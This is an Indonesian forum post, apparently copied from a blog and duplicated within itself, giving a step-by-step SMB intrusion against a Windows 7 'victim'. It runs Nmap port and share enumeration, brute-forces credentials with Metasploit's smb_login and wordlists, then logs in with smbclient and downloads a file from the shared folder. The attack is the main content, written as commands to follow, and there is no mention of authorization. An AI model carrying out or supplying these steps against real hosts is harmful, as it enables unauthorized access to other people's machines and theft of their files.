10-13-2013, 05:31 AM
Sama halnya seperti File Transfer Protocol atau lebih dikenal dengan FTP. samba juga mencakup hal-hal seperti misalnya mendapatkan file dari server ke komputer lokal, meletakkan file dari komputer lokal ke server, serta mengambil informasi direktori dari server dan sebagainya.
dalam kasus ini kita harus memiliki korban yang mengaktifkan mode share folder, maka dari itu exploit ini berhasil
Equipments:
1. smbclient
2. Nmap
3. Metasploit
tahap pertama melakukan scanning port terhadap host/ip-address korban menggunakan Nmap. Disini yang kita perlukan adalah port 445 microsoft-ds.
terlihat pd gambar diatas, port yang kita butuhkan terbuka.
sekarang mari kita lihat lebih dalam mengenai port tersebut.
--Script=smb-os-discovery: Upaya untuk menentukan sistem operasi, nama komputer, domain, workgroup, dan waktu saat ini melalui protokol SMB (port 445 atau 139).
terlihat di atas, ternyata korban kita menggunakan Sistem Operasi Windows 7 Ultimate.
Nama Komputer adalah ANONYMOUS-PC.
selanjutnya melihat list shared folder di dalam host korban.
terlihat si korban memiliki folder yang di share =)
tampaknya exploitasi kali ini akan bekerja.
selanjutnya menjalankan SmbClient
Dam* > _ <,
kita dimintai memasukkan password, bagaimana kita mendapatkan password ??? maka akan mustahil untuk sukses dengan menebak password yang dimiliki oleh korban.
jgn menyerah dulu, mari kita lanjutkan dengan metasploit ^ _ ^
yups, kita berhasil mendapatkan password
sekarang, kita kembali untuk login untuk mendapatkan list share folder yang tersedia pada host
terlihat diatas ada beberapa list share folder korban.
selanjutnya kita mencoba mengakses disk C yang ada di komputer korban
Failed ??? Status Bad For Network Name.
jelas terlihat bahwa kita tidak dapat masuk ke disk C yang ada pada komputer korban. selanjutnya kita coba masuk pada disk Smb-Shares
Success
terlihat ada sebuah file dengan nama Smb-Shares-File.txt
kemudian saya mendownload file tersebut.
get = Perintah untuk mendownload file dari host korban
dan hasilnya :
regards
source
dalam kasus ini kita harus memiliki korban yang mengaktifkan mode share folder, maka dari itu exploit ini berhasil
Equipments:
1. smbclient
2. Nmap
3. Metasploit
tahap pertama melakukan scanning port terhadap host/ip-address korban menggunakan Nmap. Disini yang kita perlukan adalah port 445 microsoft-ds.
Code:
# Nmap (Victim Ip-Address)Spoiler! :
![[Image: 1.png]](https://3.bp.blogspot.com/-moQ_jGQjzmM/UlmP68qdLsI/AAAAAAAAB00/thqxz-t3yto/s1600/1.png)
terlihat pd gambar diatas, port yang kita butuhkan terbuka.
sekarang mari kita lihat lebih dalam mengenai port tersebut.
Code:
# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)--Script=smb-os-discovery: Upaya untuk menentukan sistem operasi, nama komputer, domain, workgroup, dan waktu saat ini melalui protokol SMB (port 445 atau 139).
Spoiler! :
![[Image: 2.png]](https://4.bp.blogspot.com/-E5yWZun2Dek/UlmRgkxayjI/AAAAAAAAB1E/r1P4_KUnhYs/s1600/2.png)
terlihat di atas, ternyata korban kita menggunakan Sistem Operasi Windows 7 Ultimate.
Nama Komputer adalah ANONYMOUS-PC.
selanjutnya melihat list shared folder di dalam host korban.
Code:
# nmap -p445 --script=smb-enum-shares (Victim Ip-Address)Spoiler! :
![[Image: 4.png]](https://2.bp.blogspot.com/-wR8MlMaQHfc/UlmjJOogZPI/AAAAAAAAB1c/wv1iHlt8El0/s1600/4.png)
terlihat si korban memiliki folder yang di share =)
tampaknya exploitasi kali ini akan bekerja.
selanjutnya menjalankan SmbClient
Code:
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)Spoiler! :
![[Image: a.png]](https://3.bp.blogspot.com/-_ypl4VCo10c/UlmlF7VjOlI/AAAAAAAAB1o/BIItHh3XOpE/s1600/a.png)
Dam* > _ <,
kita dimintai memasukkan password, bagaimana kita mendapatkan password ??? maka akan mustahil untuk sukses dengan menebak password yang dimiliki oleh korban.
jgn menyerah dulu, mari kita lanjutkan dengan metasploit ^ _ ^
Code:
# msfconsole
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf auxiliary (smb_login) > runSpoiler! :
![[Image: b.png]](https://2.bp.blogspot.com/-Bbvyy0V7TRE/UlmnowLttyI/AAAAAAAAB10/sIlnG7gGoao/s1600/b.png)
yups, kita berhasil mendapatkan password
sekarang, kita kembali untuk login untuk mendapatkan list share folder yang tersedia pada host
Code:
# Smbclient -L (Korban Ip-Alamat) -U (Nama Komputer) -p (port 445)Spoiler! :
![[Image: 6.png]](https://2.bp.blogspot.com/-tbLGV5VVc2I/UlmpjTTmBhI/AAAAAAAAB2A/XInIKnNsW6g/s1600/6.png)
terlihat diatas ada beberapa list share folder korban.
selanjutnya kita mencoba mengakses disk C yang ada di komputer korban
Code:
# smbclient //Victim Ip-Address/C -U (Computer Name) -p (Port 445)Spoiler! :
![[Image: 7.png]](https://4.bp.blogspot.com/-6SqrDD5cvG4/UlmrQbufnMI/AAAAAAAAB2M/dqq2o-yt_Y4/s1600/7.png)
Failed ??? Status Bad For Network Name.
jelas terlihat bahwa kita tidak dapat masuk ke disk C yang ada pada komputer korban. selanjutnya kita coba masuk pada disk Smb-Shares
Code:
# smbclient //Victim Ip-Address//Smb-Shares -U (Computer Name) -p (Port 445)Spoiler! :
![[Image: 8.png]](https://1.bp.blogspot.com/-ID97QmLXCBU/UlmuCz2ubdI/AAAAAAAAB2Y/ercajfPvaiM/s1600/8.png)
Success
terlihat ada sebuah file dengan nama Smb-Shares-File.txt
kemudian saya mendownload file tersebut.
Code:
smb: \> get Smb-Shared-file.txtget = Perintah untuk mendownload file dari host korban
Spoiler! :
![[Image: 9.png]](https://4.bp.blogspot.com/-EDYsprlkBtM/UlmurBmdiCI/AAAAAAAAB2g/vYW6wj_A8-Y/s1600/9.png)
dan hasilnya :
Spoiler! :
![[Image: 10.png]](https://1.bp.blogspot.com/-wXzufuFNU4M/Ulmu-XdVsUI/AAAAAAAAB2s/UK9-Bp1cs_c/s1600/10.png)
regards
source
Code:
Username : [ Hidemichi-Hiroyuki]
Password : [ ******** ]
( =)) Mantap dah om H2, enggk nyangka bs seperti ini. 
:-
:-
